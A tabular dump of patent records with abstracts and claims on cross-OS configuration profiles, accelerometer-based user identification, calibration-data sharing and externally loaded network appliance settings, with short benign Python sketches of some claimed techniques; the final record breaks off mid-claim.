9,115 | 9,115 | 15,660,990 | 2,454 | Disclosed are various examples for the dynamic construction of configuration profiles using settings common across different operating systems. A computing environment having a management service can determine variable names for inclusion in configuration profiles based on operating systems. The computing environment can dynamically generate configuration profiles using the appropriate variable names such that the value provided by an administrator is a value or parameter of the variable name for deployment to a client device having an operating system capable of interpreting the value using the variable name. | 1. A system, comprising:
at least one computing device; and program instructions executable in the at least one computing device that, when executed by the at least one computing device, cause the at least one computing device to:
identify a value from a field of at least one user interface, the field being associated with a setting common to a plurality of operating systems;
determine a first variable name for inclusion in a first configuration profile in association with the value based at least in part on a first one of the plurality of operating systems;
determine a second variable name for inclusion in a second configuration profile in association with the value based at least in part on a second one of the plurality of operating systems, the second one of the plurality of operating systems being different than the first one of the plurality of operating systems;
generate the first configuration profile such that the value is a parameter of the first variable name for deployment to a first client device having the first one of the plurality of operating systems installed thereon; and
generate the second configuration profile such that the value is a parameter of the second variable name for deployment to a second client device having the second one of the plurality of operating systems installed thereon. 2. The system of claim 1, wherein:
the first configuration profile comprises a first extensible markup language (XML) document programmatically generated by the at least one computing device; and the second configuration profile comprises a second XML document programmatically generated by the at least one computing device. 3. The system of claim 2, wherein:
the first XML document is generated based at least in part on a first predefined format corresponding to the first one of the plurality of operating systems; and the second XML document is generated based at least in part on a second predefined format corresponding to the second one of the plurality of operating systems. 4. The system of claim 3, wherein the first predefined format is different than the second predefined format. 5. The system of claim 1, further comprising program instructions that, when executed, cause the at least one computing device to:
instruct a first agent application executable on the first client device to configure the first client device using the first variable name and the value; and instruct a second agent application executable on the second client device to configure the second client device using the second variable name and the value. 6. The system of claim 1, further comprising program instructions that, when executed, cause the at least one computing device to maintain a database that comprises a mapping of a name attribute for the field to the first variable name corresponding to the first one of the plurality of operating systems and the second variable name corresponding to the second one of the plurality of operating systems. 7. The system of claim 1, wherein the setting common to the plurality of operating systems is one of: a wireless fidelity (Wi-Fi) network setting, a virtual private network (VPN) setting, and an email server setting. 8. A non-transitory computer-readable medium embodying program code executable in at least one computing device that, when executed by the at least one computing device, causes the at least one computing device to:
identify a value from a field of at least one user interface, the field being associated with a setting common to a plurality of operating systems; determine a first variable name for inclusion in a first configuration profile in association with the value based at least in part on a first one of the plurality of operating systems; determine a second variable name for inclusion in a second configuration profile in association with the value based at least in part on a second one of the plurality of operating systems, the second one of the plurality of operating systems being different than the first one of the plurality of operating systems; generate the first configuration profile such that the value is a parameter of the first variable name for deployment to a first client device having the first one of the plurality of operating systems installed thereon; and generate the second configuration profile such that the value is a parameter of the second variable name for deployment to a second client device having the second one of the plurality of operating systems installed thereon. 9. The non-transitory computer-readable medium of claim 8, wherein:
the first configuration profile comprises a first extensible markup language (XML) document programmatically generated by the at least one computing device; and the second configuration profile comprises a second XML document programmatically generated by the at least one computing device. 10. The non-transitory computer-readable medium of claim 9, wherein:
the first XML document is generated based at least in part on a first predefined format corresponding to the first one of the plurality of operating systems; and the second XML document is generated based at least in part on a second predefined format corresponding to the second one of the plurality of operating systems. 11. The non-transitory computer-readable medium of claim 10, wherein the first predefined format is different than the second predefined format. 12. The non-transitory computer-readable medium of claim 8, further comprising program code that, when executed, causes the at least one computing device to:
instruct a first agent application executable on the first client device to configure the first client device using the first variable name and the value; and instruct a second agent application executable on the second client device to configure the second client device using the second variable name and the value. 13. The non-transitory computer-readable medium of claim 8, further comprising program code that, when executed, causes the at least one computing device to maintain a database that comprises a mapping of a name attribute for the field to the first variable name corresponding to the first one of the plurality of operating systems and the second variable name corresponding to the second one of the plurality of operating systems. 14. The non-transitory computer-readable medium of claim 8, wherein the setting common to the plurality of operating systems is one of: a wireless fidelity (Wi-Fi) network setting, a virtual private network (VPN) setting, and an email server setting. 15. A computer-implemented method, comprising:
identifying a value from a field of at least one user interface, the field being associated with a setting common to a plurality of operating systems; determining a first variable name for inclusion in a first configuration profile in association with the value based at least in part on a first one of the plurality of operating systems; determining a second variable name for inclusion in a second configuration profile in association with the value based at least in part on a second one of the plurality of operating systems, the second one of the plurality of operating systems being different than the first one of the plurality of operating systems; generating the first configuration profile such that the value is a parameter of the first variable name for deployment to a first client device having the first one of the plurality of operating systems installed thereon; and generating the second configuration profile such that the value is a parameter of the second variable name for deployment to a second client device having the second one of the plurality of operating systems installed thereon. 16. The computer-implemented method of claim 15, wherein:
the first configuration profile comprises a first extensible markup language (XML) document programmatically generated by at least one computing device; the second configuration profile comprises a second XML document programmatically generated by the at least one computing device; the first XML document is generated based at least in part on a first predefined format corresponding to the first one of the plurality of operating systems; and the second XML document is generated based at least in part on a second predefined format corresponding to the second one of the plurality of operating systems. 17. The computer-implemented method of claim 16, wherein the first predefined format is different than the second predefined format. 18. The computer-implemented method of claim 15, further comprising:
instructing a first agent application executable on the first client device to configure the first client device using the first variable name and the value; and instructing a second agent application executable on the second client device to configure the second client device using the second variable name and the value. 19. The computer-implemented method of claim 15, further comprising maintaining a database that comprises a mapping of a name attribute for the field to the first variable name corresponding to the first one of the plurality of operating systems and the second variable name corresponding to the second one of the plurality of operating systems. 20. The computer-implemented method of claim 15, wherein the setting common to the plurality of operating systems is one of: a wireless fidelity (Wi-Fi) network setting, a virtual private network (VPN) setting, and an email server setting. | Disclosed are various examples for the dynamic construction of configuration profiles using settings common across different operating systems. A computing environment having a management service can determine variable names for inclusion in configuration profiles based on operating systems. The computing environment can dynamically generate configuration profiles using the appropriate variable names such that the value provided by an administrator is a value or parameter of the variable name for deployment to a client device having an operating system capable of interpreting the value using the variable name. 1. A system, comprising:
at least one computing device; and program instructions executable in the at least one computing device that, when executed by the at least one computing device, cause the at least one computing device to:
identify a value from a field of at least one user interface, the field being associated with a setting common to a plurality of operating systems;
determine a first variable name for inclusion in a first configuration profile in association with the value based at least in part on a first one of the plurality of operating systems;
determine a second variable name for inclusion in a second configuration profile in association with the value based at least in part on a second one of the plurality of operating systems, the second one of the plurality of operating systems being different than the first one of the plurality of operating systems;
generate the first configuration profile such that the value is a parameter of the first variable name for deployment to a first client device having the first one of the plurality of operating systems installed thereon; and
generate the second configuration profile such that the value is a parameter of the second variable name for deployment to a second client device having the second one of the plurality of operating systems installed thereon. 2. The system of claim 1, wherein:
the first configuration profile comprises a first extensible markup language (XML) document programmatically generated by the at least one computing device; and the second configuration profile comprises a second XML document programmatically generated by the at least one computing device. 3. The system of claim 2, wherein:
the first XML document is generated based at least in part on a first predefined format corresponding to the first one of the plurality of operating systems; and the second XML document is generated based at least in part on a second predefined format corresponding to the second one of the plurality of operating systems. 4. The system of claim 3, wherein the first predefined format is different than the second predefined format. 5. The system of claim 1, further comprising program instructions that, when executed, cause the at least one computing device to:
instruct a first agent application executable on the first client device to configure the first client device using the first variable name and the value; and instruct a second agent application executable on the second client device to configure the second client device using the second variable name and the value. 6. The system of claim 1, further comprising program instructions that, when executed, cause the at least one computing device to maintain a database that comprises a mapping of a name attribute for the field to the first variable name corresponding to the first one of the plurality of operating systems and the second variable name corresponding to the second one of the plurality of operating systems. 7. The system of claim 1, wherein the setting common to the plurality of operating systems is one of: a wireless fidelity (Wi-Fi) network setting, a virtual private network (VPN) setting, and an email server setting. 8. A non-transitory computer-readable medium embodying program code executable in at least one computing device that, when executed by the at least one computing device, causes the at least one computing device to:
identify a value from a field of at least one user interface, the field being associated with a setting common to a plurality of operating systems; determine a first variable name for inclusion in a first configuration profile in association with the value based at least in part on a first one of the plurality of operating systems; determine a second variable name for inclusion in a second configuration profile in association with the value based at least in part on a second one of the plurality of operating systems, the second one of the plurality of operating systems being different than the first one of the plurality of operating systems; generate the first configuration profile such that the value is a parameter of the first variable name for deployment to a first client device having the first one of the plurality of operating systems installed thereon; and generate the second configuration profile such that the value is a parameter of the second variable name for deployment to a second client device having the second one of the plurality of operating systems installed thereon. 9. The non-transitory computer-readable medium of claim 8, wherein:
the first configuration profile comprises a first extensible markup language (XML) document programmatically generated by the at least one computing device; and the second configuration profile comprises a second XML document programmatically generated by the at least one computing device. 10. The non-transitory computer-readable medium of claim 9, wherein:
the first XML document is generated based at least in part on a first predefined format corresponding to the first one of the plurality of operating systems; and the second XML document is generated based at least in part on a second predefined format corresponding to the second one of the plurality of operating systems. 11. The non-transitory computer-readable medium of claim 10, wherein the first predefined format is different than the second predefined format. 12. The non-transitory computer-readable medium of claim 8, further comprising program code that, when executed, causes the at least one computing device to:
instruct a first agent application executable on the first client device to configure the first client device using the first variable name and the value; and instruct a second agent application executable on the second client device to configure the second client device using the second variable name and the value. 13. The non-transitory computer-readable medium of claim 8, further comprising program code that, when executed, causes the at least one computing device to maintain a database that comprises a mapping of a name attribute for the field to the first variable name corresponding to the first one of the plurality of operating systems and the second variable name corresponding to the second one of the plurality of operating systems. 14. The non-transitory computer-readable medium of claim 8, wherein the setting common to the plurality of operating systems is one of: a wireless fidelity (Wi-Fi) network setting, a virtual private network (VPN) setting, and an email server setting. 15. A computer-implemented method, comprising:
identifying a value from a field of at least one user interface, the field being associated with a setting common to a plurality of operating systems; determining a first variable name for inclusion in a first configuration profile in association with the value based at least in part on a first one of the plurality of operating systems; determining a second variable name for inclusion in a second configuration profile in association with the value based at least in part on a second one of the plurality of operating systems, the second one of the plurality of operating systems being different than the first one of the plurality of operating systems; generating the first configuration profile such that the value is a parameter of the first variable name for deployment to a first client device having the first one of the plurality of operating systems installed thereon; and generating the second configuration profile such that the value is a parameter of the second variable name for deployment to a second client device having the second one of the plurality of operating systems installed thereon. 16. The computer-implemented method of claim 15, wherein:
the first configuration profile comprises a first extensible markup language (XML) document programmatically generated by at least one computing device; the second configuration profile comprises a second XML document programmatically generated by the at least one computing device; the first XML document is generated based at least in part on a first predefined format corresponding to the first one of the plurality of operating systems; and the second XML document is generated based at least in part on a second predefined format corresponding to the second one of the plurality of operating systems. 17. The computer-implemented method of claim 16, wherein the first predefined format is different than the second predefined format. 18. The computer-implemented method of claim 15, further comprising:
instructing a first agent application executable on the first client device to configure the first client device using the first variable name and the value; and instructing a second agent application executable on the second client device to configure the second client device using the second variable name and the value. 19. The computer-implemented method of claim 15, further comprising maintaining a database that comprises a mapping of a name attribute for the field to the first variable name corresponding to the first one of the plurality of operating systems and the second variable name corresponding to the second one of the plurality of operating systems. 20. The computer-implemented method of claim 15, wherein the setting common to the plurality of operating systems is one of: a wireless fidelity (Wi-Fi) network setting, a virtual private network (VPN) setting, and an email server setting. | 2,400 |
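The per-OS profile-generation scheme recited in the claims above can be sketched as follows. This is a minimal illustration only: the field name, OS identifiers, XML layout, and the `VARIABLE_NAMES` mapping are invented assumptions, not taken from the patent.

```python
# Sketch of the claimed technique: one value entered in a common UI field is
# mapped to OS-specific variable names and emitted as per-OS XML configuration
# profiles. All identifiers below are hypothetical.
import xml.etree.ElementTree as ET

# Hypothetical database mapping a field's name attribute to per-OS variable names
# (the "mapping of a name attribute" recited in claims 6, 13, and 19).
VARIABLE_NAMES = {
    "wifi_ssid": {"os_a": "SSID_STR", "os_b": "wifi.ssid"},
}

def generate_profile(os_id: str, field: str, value: str) -> str:
    """Build an XML configuration profile in which the value is a parameter
    of the OS-specific variable name for the given field."""
    var_name = VARIABLE_NAMES[field][os_id]
    root = ET.Element("profile", attrib={"os": os_id})
    setting = ET.SubElement(root, "setting", attrib={"name": var_name})
    setting.text = value
    return ET.tostring(root, encoding="unicode")

# The same value yields two differently keyed profiles, one per operating system.
profile_a = generate_profile("os_a", "wifi_ssid", "CorpNet")
profile_b = generate_profile("os_b", "wifi_ssid", "CorpNet")
```

Each profile carries the identical value under a different variable name, matching the claims' requirement that the two generated documents follow different predefined per-OS formats.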
9,116 | 9,116 | 14,967,562 | 2,422 | Methods, systems, and an entertainment device are provided for identifying a user. A method includes detecting acceleration of a user manipulated component, comparing the detected acceleration with user acceleration that is associated with a user of an electronic device, identifying the user of the electronic device based on the comparison of the detected acceleration and the user acceleration, and operating the electronic device based on the identified user of the electronic device. | 1. A method of identifying a user of an electronic device, the method comprising:
detecting an acceleration noise pattern of a user manipulated component, wherein detecting the acceleration noise pattern of the user manipulated component further comprises detecting acceleration with an accelerometer and a gyroscope while the user manipulated component is at rest in a hand of a user of the electronic device; comparing the detected acceleration noise pattern with user acceleration that is associated with the user of the electronic device, wherein comparing includes comparing time domain data of the detected acceleration noise pattern with time domain data of the user acceleration; identifying the user of the electronic device based on the comparison of the detected acceleration noise pattern and the user acceleration; and operating the electronic device based on the identified user of the electronic device. 2. The method of claim 1 further comprising:
selecting the user of the electronic device;
capturing the user acceleration;
associating the user acceleration with the user of the electronic device; and
storing the user acceleration. 3. The method of claim 1 further including turning on components of the user manipulated component based on the acceleration of the user manipulated component and further including turning off the components of the user manipulated component based on the detected acceleration noise pattern indicating that the user manipulated component has been set down. 4. The method of claim 1 further including loading user specific operating characteristics for the identified user, and wherein operating the electronic device further comprises operating the electronic device based on the loaded user specific operating characteristics. 5. The method of claim 4 wherein loading the user specific operating characteristics further comprises loading at least one of programming recommendations for the user, a list of favorite channels specified by the user, parental control information associated with the user, purchase information associated with the user, and remote control codes. 6. The method of claim 1 wherein comparing the detected acceleration noise pattern with the user acceleration includes comparing the user acceleration with the detected acceleration when the user picks up the user manipulated component. 7. The method of claim 1, wherein comparing time domain data with the user acceleration includes comparing using Viterbi methods, Fano methods, or combinations thereof. 8. An entertainment system comprising:
a television receiver configured to receive video content from a media service provider; a remote control configured to interact with the television receiver and including control logic operable to:
detect an acceleration noise pattern of the remote control while the remote control is at rest in a hand of a user of the remote control;
compare the detected acceleration noise pattern with user acceleration that is associated with a user of the television receiver, wherein the control logic is further operable to compare time domain data of the detected acceleration noise pattern with time domain data of the user acceleration;
identify the user of the television receiver based on the comparison of the detected acceleration noise pattern and the user acceleration; and
operate the television receiver based on the identified user of the television receiver. 9. The entertainment system of claim 8 wherein the television receiver further comprises control logic operable to:
select the user of the television receiver;
capture the user acceleration;
associate the user acceleration with the user of the television receiver; and
store the user acceleration;
load at least one of programming recommendations for the user, a list of favorite channels specified by the user, parental control information associated with the user, purchase information associated with the user, and remote control codes. 10. The entertainment system of claim 8 wherein the control logic is further operable to turn on components of the remote control based on the detected acceleration noise pattern of the remote control and is further operable to turn off the components of the remote control based on the detected acceleration noise pattern indicating that the remote control has been set down. 11. The entertainment system of claim 8 wherein the remote control further comprises an accelerometer and a gyroscope, and wherein the control logic of the remote control is further operable to detect acceleration with the accelerometer and the gyroscope. 12. The entertainment system of claim 8 wherein the control logic of the remote control is further operable to compare the user acceleration with the detected acceleration noise pattern when the user is picking up the remote control. 13. An entertainment device comprising:
an accelerometer; and control logic operable to:
detect an acceleration noise pattern of the entertainment device using the accelerometer while the entertainment device is at rest in a hand of a user of the entertainment device;
compare the detected acceleration noise pattern with user acceleration that is associated with a user of the entertainment device, wherein the control logic is further operable to compare time domain data of the detected acceleration noise pattern with time domain data of the user acceleration;
identify the user of the entertainment device based on the comparison of the detected acceleration noise pattern and the user acceleration; and
operate the entertainment device based on the identified user of the entertainment device. 14. The entertainment device of claim 13 further comprising an indicator light, and wherein the control logic is further operable to turn on components of the entertainment device based on the acceleration of the entertainment device, and wherein the control logic is further operable to turn off the components of the entertainment device based on acceleration indicating that the entertainment device has been set down. 15. The entertainment device of claim 13 further comprising a gyroscope, and wherein the control logic is further operable to detect acceleration with the accelerometer and the gyroscope. 16. The entertainment device of claim 13 wherein the control logic is further operable to compare the user acceleration noise pattern with the detected acceleration when the user is picking up the entertainment device. | Methods, systems, and an entertainment device are provided for identifying a user. A method includes detecting acceleration of a user manipulated component, comparing the detected acceleration with user acceleration that is associated with a user of an electronic device, identifying the user of the electronic device based on the comparison of the detected acceleration and the user acceleration, and operating the electronic device based on the identified user of the electronic device.1. A method of identifying a user of an electronic device, the method comprising:
detecting an acceleration noise pattern of a user manipulated component, wherein detecting the acceleration noise pattern of the user manipulated component further comprises detecting acceleration with an accelerometer and a gyroscope while the user manipulated component is at rest in a hand of a user of the electronic device; comparing the detected acceleration noise pattern with user acceleration that is associated with the user of the electronic device, wherein comparing includes comparing time domain data of the detected acceleration noise pattern with time domain data of the user acceleration; identifying the user of the electronic device based on the comparison of the detected acceleration noise pattern and the user acceleration; and operating the electronic device based on the identified user of the electronic device. 2. The method of claim 1 further comprising:
selecting the user of the electronic device;
capturing the user acceleration;
associating the user acceleration with the user of the electronic device; and
storing the user acceleration. 3. The method of claim 1 further including turning on components of the user manipulated component based on the acceleration of the user manipulated component and further including turning off the components of the user manipulated component based on the detected acceleration noise pattern indicating that the user manipulated component has been set down. 4. The method of claim 1 further including loading user specific operating characteristics for the identified user, and wherein operating the electronic device further comprises operating the electronic device based on the loaded user specific operating characteristics. 5. The method of claim 4 wherein loading the user specific operating characteristics further comprises loading at least one of programming recommendations for the user, a list of favorite channels specified by the user, parental control information associated with the user, purchase information associated with the user, and remote control codes. 6. The method of claim 1 wherein comparing the detected acceleration noise pattern with the user acceleration includes comparing the user acceleration with the detected acceleration when the user picks up the user manipulated component. 7. The method of claim 1, wherein comparing time domain data with the user acceleration includes comparing using Viterbi methods, Fano methods, or combinations thereof. 8. An entertainment system comprising:
a television receiver configured to receive video content from a media service provider; a remote control configured to interact with the television receiver and including control logic operable to:
detect an acceleration noise pattern of the remote control while the remote control is at rest in a hand of a user of the remote control;
compare the detected acceleration noise pattern with user acceleration that is associated with a user of the television receiver, wherein the control logic is further operable to compare time domain data of the detected acceleration noise pattern with time domain data of the user acceleration;
identify the user of the television receiver based on the comparison of the detected acceleration noise pattern and the user acceleration; and
operate the television receiver based on the identified user of the television receiver. 9. The entertainment system of claim 8 wherein the television receiver further comprises control logic operable to:
select the user of the television receiver;
capture the user acceleration;
associate the user acceleration with the user of the television receiver; and
store the user acceleration;
load at least one of programming recommendations for the user, a list of favorite channels specified by the user, parental control information associated with the user, purchase information associated with the user, and remote control codes. 10. The entertainment system of claim 8 wherein the control logic is further operable to turn on components of the remote control based on the detected acceleration noise pattern of the remote control and is further operable to turn off the components of the remote control based on the detected acceleration noise pattern indicating that the remote control has been set down. 11. The entertainment system of claim 8 wherein the remote control further comprises an accelerometer and a gyroscope, and wherein the control logic of the remote control is further operable to detect acceleration with the accelerometer and the gyroscope. 12. The entertainment system of claim 8 wherein the control logic of the remote control is further operable to compare the user acceleration with the detected acceleration noise pattern when the user is picking up the remote control. 13. An entertainment device comprising:
an accelerometer; and control logic operable to:
detect an acceleration noise pattern of the entertainment device using the accelerometer while the entertainment device is at rest in a hand of a user of the entertainment device;
compare the detected acceleration noise pattern with user acceleration that is associated with a user of the entertainment device, wherein the control logic is further operable to compare time domain data of the detected acceleration noise pattern with time domain data of the user acceleration;
identify the user of the entertainment device based on the comparison of the detected acceleration noise pattern and the user acceleration; and
operate the entertainment device based on the identified user of the entertainment device. 14. The entertainment device of claim 13 further comprising an indicator light, and wherein the control logic is further operable to turn on components of the entertainment device based on the acceleration of the entertainment device, and where the control logic is further operable to turn off the components of the entertainment device based on acceleration indicating that the entertainment device has been set down. 15. The entertainment device of claim 13 further comprising a gyroscope, and wherein the control logic is further operable to detect acceleration with the accelerometer and the gyroscope. 16. The entertainment device of claim 13 wherein the control logic is further operable to compare the user acceleration noise pattern with the detected acceleration when the user is picking up the entertainment device. | 2,400 |
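The time-domain comparison recited in the claims above might look like the following sketch. The mean-squared-distance metric and the threshold here are stand-in assumptions (the claims name Viterbi and Fano methods as options), and all variable names and sample values are invented for illustration.

```python
# Sketch of identifying a user from an acceleration noise pattern captured
# while a device rests in the user's hand. The distance metric and threshold
# are assumptions, not the patent's specified method.
import math

def pattern_distance(a, b):
    """Mean squared difference between two equal-length time-domain traces."""
    return sum((x - y) ** 2 for x, y in zip(a, b)) / len(a)

def identify_user(detected, user_patterns, threshold=0.05):
    """Return the enrolled user whose stored pattern best matches the
    detected trace, or None if no match is close enough."""
    best_user, best_dist = None, math.inf
    for user, stored in user_patterns.items():
        d = pattern_distance(detected, stored)
        if d < best_dist:
            best_user, best_dist = user, d
    return best_user if best_dist <= threshold else None

# Hypothetical stored per-user noise patterns (enrollment step of claim 2).
patterns = {"alice": [0.01, 0.02, 0.01, 0.03], "bob": [0.10, 0.12, 0.09, 0.11]}
who = identify_user([0.011, 0.021, 0.012, 0.028], patterns)
```

The identified user would then drive the device behavior described in claims 4-5, such as loading that user's channel favorites or parental controls.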
9,117 | 9,117 | 16,066,413 | 2,442 | Example implementations relate to calibration data transmissions. For example, a computing device includes a storage device to store calibration data of an electronic device coupled to the computing device. The computing device also includes a network interface to establish a network connection with a second computing device. The computing device further includes a processor to automatically transmit, via the network connection, the calibration data to the second computing device based on a location of the second computing device relative to the computing device and based on an association with the second computing device via a communication session. | 1. A computing device comprising:
a storage device to store calibration data of an electronic device coupled to the computing device; a network interface to establish a network connection with a second computing device; and a processor to:
automatically transmit, via the network connection, the calibration data to the second computing device based on a location of the second computing device relative to the computing device and based on an association with the second computing device via a communication session. 2. The computing device of claim 1, wherein the communication session includes a virtual meeting or wireless screen-sharing session. 3. The computing device of claim 1, wherein in response to detecting that the second computing device is at the same physical location as the computing device and in response to detecting that the second computing device is communicating with the computing device via the communication session, transmit the calibration data to the second computing device. 4. The computing device of claim 1, wherein the electronic device is a display device or a digital writing device. 5. The computing device of claim 1, wherein the storage device is to store pairing information associated with a second electronic device, and wherein the processor is to transmit the pairing information to the second computing device based on the location of the second computing device relative to the computing device and based on the association with the second computing device via the communication session. 6. A computing device comprising:
a storage device to store calibration data of a first electronic device coupled to the computing device; a network interface to establish a network connection with a second computing device; and a processor to:
automatically transmit, via the network connection, the calibration data to the second computing device in response to a determination that a location of the second computing device satisfies a location threshold and in response to a determination that the computing device and the second computing device are associated via a communication session; and
receive calibration data of a second electronic device coupled to the second computing device from the second computing device. 7. The computing device of claim 6, wherein the processor is to receive pairing information of a third electronic device from the second computing device, and wherein the processor is to complete a pairing operation with the third electronic device using the pairing information. 8. The computing device of claim 7, wherein the processor is to remove the calibration data of the second electronic device and the pairing information in response to detecting a change to the location of the second computing device. 9. The computing device of claim 6, wherein the first electronic device is a display device, and wherein the second electronic device is a digital writing device. 10. The computing device of claim 6, wherein the communication session includes a virtual meeting or wireless screen-sharing session. 11. A non-transitory computer-readable storage medium comprising instructions that when executed cause a processor of a computing device to:
establish, via a network interface of the computing device, a network connection with a second computing device; automatically transmit, via the network connection, calibration data of a first electronic device coupled to the computing device to the second computing device based on a location of the second computing device relative to the computing device and based on a communication session between the computing device and the second computing device; receive calibration data of a second electronic device from the second computing device; and in response to detecting a change to the location or the communication session, remove the calibration data of the second electronic device from the computing device. 12. The non-transitory computer-readable storage medium of claim 11, wherein the instructions when executed further cause the processor to remove the calibration data of the second electronic device in response to detecting that the second computing device is at a different location than the computing device. 13. The non-transitory computer-readable storage medium of claim 11, wherein the instructions when executed further cause the processor to remove the calibration data of the second electronic device in response to detecting an end to the communication session. 14. The non-transitory computer-readable storage medium of claim 11, wherein the first electronic device is a display device, and wherein the second electronic device is a digital writing device. 15. The non-transitory computer-readable storage medium of claim 11, wherein the communication session includes a virtual meeting or wireless screen-sharing session. | Example implementations relate to calibration data transmissions. For example, a computing device includes a storage device to store calibration data of an electronic device coupled to the computing device. The computing device also includes a network interface to establish a network connection with a second computing device.
The computing device further includes a processor to automatically transmit, via the network connection, the calibration data to the second computing device based on a location of the second computing device relative to the computing device and based on an association with the second computing device via a communication session.1. A computing device comprising:
a storage device to store calibration data of an electronic device coupled to the computing device; a network interface to establish a network connection with a second computing device; and a processor to:
automatically transmit, via the network connection, the calibration data to the second computing device based on a location of the second computing device relative to the computing device and based on an association with the second computing device via a communication session. 2. The computing device of claim 1, wherein the communication session includes a virtual meeting or wireless screen-sharing session. 3. The computing device of claim 1, wherein in response to detecting that the second computing device is at the same physical location as the computing device and in response to detecting that the second computing device is communicating with the computing device via the communication session, transmit the calibration data to the second computing device. 4. The computing device of claim 1, wherein the electronic device is a display device or a digital writing device. 5. The computing device of claim 1, wherein the storage device is to store pairing information associated with a second electronic device, and wherein the processor is to transmit the pairing information to the second computing device based on the location of the second computing device relative to the computing device and based on the association with the second computing device via the communication session. 6. A computing device comprising:
a storage device to store calibration data of a first electronic device coupled to the computing device; a network interface to establish a network connection with a second computing device; and a processor to:
automatically transmit, via the network connection, the calibration data to the second computing device in response to a determination that a location of the second computing device satisfies a location threshold and in response to a determination that the computing device and the second computing device are associated via a communication session; and
receive calibration data of a second electronic device coupled to the second computing device from the second computing device. 7. The computing device of claim 6, wherein the processor is to receive pairing information of a third electronic device from the second computing device, and wherein the processor is to complete a pairing operation with the third electronic device using the pairing information. 8. The computing device of claim 7, wherein the processor is to remove the calibration data of the second electronic device and the pairing information in response to detecting a change to the location of the second computing device. 9. The computing device of claim 6, wherein the first electronic device is a display device, and wherein the second electronic device is a digital writing device. 10. The computing device of claim 6, wherein the communication session includes a virtual meeting or wireless screen-sharing session. 11. A non-transitory computer-readable storage medium comprising instructions that when executed cause a processor of a computing device to:
establish, via a network interface of the computing device, a network connection with a second computing device; automatically transmit, via the network connection, calibration data of a first electronic device coupled to the computing device to the second computing device based on a location of the second computing device relative to the computing device and based on a communication session between the computing device and the second computing device; receive calibration data of a second electronic device from the second computing device; and in response to detecting a change to the location or the communication session, remove the calibration data of the second electronic device from the computing device. 12. The non-transitory computer-readable storage medium of claim 11, wherein the instructions when executed further cause the processor to remove the calibration data of the second electronic device in response to detecting that the second computing device is at a different location than the computing device. 13. The non-transitory computer-readable storage medium of claim 11, wherein the instructions when executed further cause the processor to remove the calibration data of the second electronic device in response to detecting an end to the communication session. 14. The non-transitory computer-readable storage medium of claim 11, wherein the first electronic device is a display device, and wherein the second electronic device is a digital writing device. 15. The non-transitory computer-readable storage medium of claim 11, wherein the communication session includes a virtual meeting or wireless screen-sharing session. | 2,400 |
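The calibration-data sharing policy in the claims above, including transmitting only to a co-located peer in the same communication session and removing received data when either condition changes, can be sketched as below. The class, field names, and sample data are illustrative assumptions, not the patent's implementation.

```python
# Sketch of the claimed policy: share calibration data only with a peer that
# is at the same location and joined to the same session; drop received data
# when the peer's location or session changes. All names are hypothetical.
class CalibrationSharer:
    def __init__(self, own_location, session_id):
        self.own_location = own_location
        self.session_id = session_id
        self.received = {}  # peer id -> calibration data received from it

    def peer_eligible(self, peer_location, peer_session):
        """Both conditions of the claims: co-located and in the same session."""
        return peer_location == self.own_location and peer_session == self.session_id

    def receive(self, peer, data, peer_location, peer_session):
        """Keep a peer's calibration data only while it is eligible."""
        if self.peer_eligible(peer_location, peer_session):
            self.received[peer] = data

    def on_peer_update(self, peer, peer_location, peer_session):
        """Remove stored data when the peer leaves the location or session."""
        if not self.peer_eligible(peer_location, peer_session):
            self.received.pop(peer, None)

dev = CalibrationSharer("room-12", "meeting-1")
dev.receive("peerB", {"display_gamma": 2.2}, "room-12", "meeting-1")
dev.on_peer_update("peerB", "room-12", None)  # session ended: data is removed
```

The same eligibility check would gate the outbound transmit path on the sending device, mirroring claims 1, 6, and 11.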
9,118 | 9,118 | 13,705,601 | 2,458 | Methods and systems for temporarily configuring a network appliance in accordance with externally provided customized configuration settings are provided. According to one embodiment, a network appliance may operate in one of multiple configuration modes, including an internal configuration mode and an external configuration mode. When operating in the internal configuration mode, the network appliance loads and runs configuration settings from a memory internal to the network appliance. When operating in the external configuration mode, the network appliance loads and runs configuration settings from an external storage device coupled to an interface of the network appliance. | 1. A method comprising:
providing a network appliance with a plurality of configuration modes, including an internal configuration mode and an external configuration mode; when operating in the internal configuration mode, configuring the network appliance by loading and running configuration settings from a memory internal to the network appliance; and when operating in the external configuration mode, configuring the network appliance by loading and running configuration settings from an external storage device coupled to an interface of the network appliance. 2. The method of claim 1, further comprising responsive to detecting the external storage device has been coupled to the interface, causing the network appliance to enter into the external configuration mode. 3. The method of claim 1, further comprising while in the external configuration mode performing audit processing including logging information relating to one or more of security, reliability, loopholes, quality of data, quality of service, and quality of transmission of the network appliance. 4. The method of claim 3, further comprising responsive to detecting the external storage device has been decoupled from the interface:
erasing from a memory of the network appliance data collected during the audit processing; and causing the network appliance to enter into the internal configuration mode. 5. The method of claim 1, further comprising responsive to detecting the external storage device is not coupled to the interface, causing the network appliance to enter into the internal configuration mode. 6. The method of claim 3, wherein the configuration settings loaded from the external storage device are configured to facilitate auditing of one or more of security, reliability, loopholes, quality of data, quality of service, and quality of transmission of the network appliance. 7. The method of claim 6, wherein the configuration settings comprise one or more valid traffic classes, a normal burst size, Weighted Fair Queuing (WFQ) bandwidth usage, a standby routing protocol, a router ID for Open Shortest Path First (OSPF) routing protocol, route reflector setup settings, Border Gateway Protocol (BGP) neighbor reachability information, a BGP synchronization setting, one or more multiprotocol label switching (MPLS) parameters, a log level, a community-string and an object qualifier. 8. A method comprising:
detecting an external storage device coupled to an interface of a network appliance, wherein the network appliance is running in accordance with an original operating state as dictated by internal configuration settings stored in an internal memory of the network appliance; responsive to the detecting:
loading customized configuration settings stored in the external storage device;
configuring the network appliance in accordance with the customized configuration settings; and
performing a predetermined function based on the customized configuration settings. 9. The method of claim 8, further comprising responsive to detecting decoupling of the external storage device from the interface:
